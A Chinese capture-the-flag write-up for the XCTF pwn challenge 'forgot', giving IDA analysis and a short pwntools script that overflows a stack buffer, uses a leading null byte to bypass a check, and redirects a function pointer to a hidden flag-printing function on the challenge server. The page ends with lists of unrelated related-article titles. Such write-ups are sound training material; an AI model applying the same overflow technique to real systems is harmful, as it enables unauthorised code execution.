[攻防世界 pwn]——forgot

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:

    在checksec看下保护

    在IDA中,




    竟然有后面函数, 找到sub_80486CC函数地址

    发现最后(*(&v3 + --v14))()执行
    我们可以令v14 = 1这样就相当于v3所指向的函数执行
    将v3所指向的函数地址覆盖为我们想要的函数地址就可以了
    第一个栈溢出无法利用, 第二个可以利用

利用’\x00’开头的字符串绕过检查, v2距离v3 = 0x20

exploit

from pwn import *
p=remote("111.200.241.244",39247)
context.log_level = 'debug'
p.recvuntil("> ")
p.sendline('peak')
payload='\x00' + 'a'*(0x20 - 1)+p32(0x080486cc)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()

[攻防世界 pwn]——forgot相关推荐

  1. 攻防世界 pwn forgot

    下面记录一下我在做攻防世界的pwn练习题中的forgot题目的过程,这个题目现在还是有些疑惑的 首先我们看一下题目的安全机制: 然后IDA看一下主函数: int __cdecl main() {siz ...

  2. 攻防世界pwn——forgot

    分析 checksec IDA 直接搜flag找到sub_80486CC,有system,这肯定是我们要调用的函数了,函数地址0x080486CC int sub_80486CC() {char s[ ...

  3. 攻防世界(Pwn) forgot---栈溢出;(方法二)

    攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...

  4. 攻防世界(Pwn) forgot---栈溢出;(方法一)

    攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...

  5. 攻防世界 Pwn 进阶 第一页

    00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区. 攻防世界 Pwn 新手 1.栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc. 常见漏洞点有read( ...

  6. [攻防世界 pwn]——pwn1(内涵peak小知识)

    [攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...

  7. [攻防世界 pwn]——实时数据监测

    [攻防世界 pwn]--实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746 ...

  8. [攻防世界 pwn]——monkey

    [攻防世界 pwn]--monkey 题目地址:https://adworld.xctf.org.cn/ 题目: 额,怎么说呢这道题.checksec没什么大不了的 但是再IDA中就懵了,好大呀.好多 ...

  9. [攻防世界 pwn]——反应釜开关控制

    [攻防世界 pwn]--反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit ...

最新文章

  1. c++ vector 中的坑
  2. 一道SQL面试题(行列互换)
  3. 制作透明的图标ICO
  4. Selenium关于滚动条的定位方法总结
  5. 怎样使用Google chrome播放 .swf 文件
  6. zedgraph怎么画曲线图_ZedGraph如何动态的加载曲线
  7. 计算机常用端口号以及对应服务总结
  8. 2008服务器系统c盘清理,WindowsServer2008清理C盘空间
  9. Stack栈后进先出
  10. oracle的mins,分钟的英文缩写,10min还是10mins!
  11. 全网首发ai绘画小程序基于novelai
  12. 游戏盾是什么/为什么app会被攻击
  13. 经典分割线 html分割线
  14. Unity 之 实用技巧更换编辑器主题
  15. 安装ubuntu 遇到的问题
  16. 学校工业4.0智能制造生产线实训方案
  17. mysql 主键列_MySQL列属性 之 主键
  18. 184_刘发顺_Java核心编程
  19. Android ToggleButton(自定义可滑动的ToggleButton控件)
  20. k8s之vpa浅析(附带案例)

热门文章

  1. sqlmap报错注入
  2. [论文阅读] (17)CCS2019 针对PowerShell脚本的轻量级去混淆和语义感知攻击检测(经典)
  3. [Python人工智能] 二十七.基于BiLSTM-CRF的医学命名实体识别研究(下)模型构建
  4. 随笔:写给我深爱的球队
  5. android 判断是否有网络连接,判断网络连接类型
  6. 28335的CPU定时器解析
  7. linux安装完怎么分区,Linux系统安装模式下硬盘分区怎么做?
  8. 大脑构造图与功能解析_解析地轨、隐藏轨推拉门及折叠门的构造做法,收藏学习...
  9. matlab 滤掉高斯噪声吗,我想问一下:怎么用matlab编写函数对图像进行高斯滤波以去除噪声...
  10. c语言 数组指针,C语言数组名及指向数组指针的小结